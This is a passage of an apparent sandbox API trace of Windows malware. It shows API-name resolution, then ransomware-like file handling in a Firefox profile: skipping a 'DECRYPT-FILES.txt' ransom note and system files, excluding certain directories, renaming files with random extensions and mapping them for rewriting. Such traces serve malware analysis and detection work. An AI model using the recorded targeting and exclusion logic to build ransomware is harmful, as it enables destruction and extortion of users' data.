(lpString="CREATESEMAPHOREEXA") returned 18 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0184.107] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0184.107] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0184.107] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0184.107] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0184.107] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0184.107] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0184.107] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0184.107] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0184.107] lstrlenA (lpString="CREATETHREAD") returned 12 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0184.107] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0184.107] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0184.107] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0184.107] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0184.107] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0184.107] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0184.107] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0184.107] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0184.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0184.108] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0184.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0184.108] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0184.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0184.108] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0184.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0184.108] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0184.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0184.108] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0184.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0184.108] lstrlenA (lpString="CTRLROUTINE") returned 11 [0184.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0184.108] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0184.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0184.108] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0184.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0184.108] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0184.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0184.108] lstrlenA (lpString="DEBUGBREAK") returned 10 [0184.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0184.108] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0184.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0184.108] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0184.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0184.108] lstrlenA (lpString="DECODEPOINTER") returned 13 [0184.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0184.108] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0184.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0184.108] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0184.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0184.108] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0184.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0184.108] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0184.109] lstrlenA (lpString="DELETEATOM") returned 10 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0184.109] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0184.109] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0184.109] lstrlenA (lpString="DELETEFIBER") returned 11 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0184.109] lstrlenA (lpString="DELETEFILEA") returned 11 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0184.109] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0184.109] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0184.109] lstrlenA (lpString="DELETEFILEW") returned 11 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0184.109] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0184.109] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0184.109] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0184.109] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0184.109] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0184.109] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0184.109] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0184.109] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0184.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0184.109] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0184.110] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0184.110] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0184.110] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0184.110] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0184.110] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0184.110] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0184.110] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0184.110] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0184.110] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0184.110] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0184.110] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0184.110] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0184.110] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0184.110] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0184.110] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0184.110] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0184.110] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0184.110] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0184.111] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0184.111] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0184.111] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0184.111] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0184.111] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0184.111] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0184.111] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0184.111] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0184.111] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0184.111] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0184.111] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0184.111] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0184.111] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0184.111] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0184.111] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0184.111] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0184.111] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.tH2DB") returned 108 [0184.111] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.tH2DB.iR1F") returned 113 [0184.111] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.tH2DB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini.th2db"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.tH2DB.iR1F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini.th2db.ir1f"), dwFlags=0x0) returned 1 [0184.113] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.113] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.113] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.113] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb45b48b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb45b48b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xac8a5700, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x70108, dwReserved0=0x0, dwReserved1=0x0, cFileName="extensions.sqlite.1Cii", cAlternateFileName="EXTENS~1.1CI")) returned 1 [0184.113] lstrcmpiW (lpString1="extensions.sqlite.1Cii", lpString2="DECRYPT-FILES.txt") returned 1 [0184.113] lstrcmpiW (lpString1="extensions.sqlite.1Cii", lpString2="autorun.inf") returned 1 [0184.113] lstrcmpiW (lpString1="extensions.sqlite.1Cii", lpString2="boot.ini") returned 1 [0184.113] lstrcmpiW (lpString1="extensions.sqlite.1Cii", lpString2="desktop.ini") returned 1 [0184.113] lstrcmpiW (lpString1="extensions.sqlite.1Cii", lpString2="ntuser.dat") returned -1 [0184.114] lstrcmpiW (lpString1="extensions.sqlite.1Cii", lpString2="iconcache.db") returned -1 [0184.114] lstrcmpiW (lpString1="extensions.sqlite.1Cii", lpString2="bootsect.bak") returned 1 [0184.114] lstrcmpiW (lpString1="extensions.sqlite.1Cii", lpString2="ntuser.dat.log") returned -1 [0184.114] lstrcmpiW (lpString1="extensions.sqlite.1Cii", lpString2="thumbs.db") returned -1 [0184.114] lstrcmpiW (lpString1="extensions.sqlite.1Cii", lpString2="Bootfont.bin") returned 1 [0184.114] lstrlenW (lpString="extensions.sqlite.1Cii") returned 22 [0184.114] lstrcmpiW (lpString1="1Cii", lpString2="lnk") returned -1 [0184.114] lstrcmpiW (lpString1="1Cii", lpString2="exe") returned -1 [0184.114] lstrcmpiW (lpString1="1Cii", lpString2="sys") returned -1 [0184.114] lstrcmpiW (lpString1="1Cii", lpString2="dll") returned -1 [0184.114] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.114] lstrlenW (lpString="extensions.sqlite.1Cii") returned 22 [0184.114] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.114] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="extensions.sqlite.1Cii" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.1Cii") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.1Cii" [0184.114] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.114] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.1Cii" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite.1cii"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.114] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=459016) returned 1 [0184.115] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.115] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2b30000 [0184.234] UnmapViewOfFile (lpBaseAddress=0x2b30000) returned 1 [0184.234] CloseHandle (hObject=0x288) returned 1 [0184.234] CloseHandle (hObject=0x284) returned 1 [0184.234] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.234] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac8cb860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac8cb860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="indexedDB", cAlternateFileName="INDEXE~1")) returned 1 [0184.234] lstrcmpW (lpString1="indexedDB", lpString2=".") returned 1 [0184.234] lstrcmpW (lpString1="indexedDB", lpString2="..") returned 1 [0184.234] lstrcatW (in: lpString1="indexedDB", lpString2="\\" | out: lpString1="indexedDB\\") returned="indexedDB\\" [0184.234] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="indexedDB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0184.234] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\Program Files") returned 0x0 [0184.234] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch=":\\Windows") returned 0x0 [0184.234] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\Games\\") returned 0x0 [0184.234] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\Tor Browser\\") returned 0x0 [0184.234] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\ProgramData\\") returned 0x0 [0184.235] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0184.235] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0184.235] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0184.235] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\All Users") returned 0x0 [0184.235] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\IETldCache\\") returned 0x0 [0184.235] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\Local Settings\\") returned 0x0 [0184.235] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\AppData\\Local") returned 0x0 [0184.235] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="AhnLab") returned 0x0 [0184.235] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0184.235] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned 98 [0184.235] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.235] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS 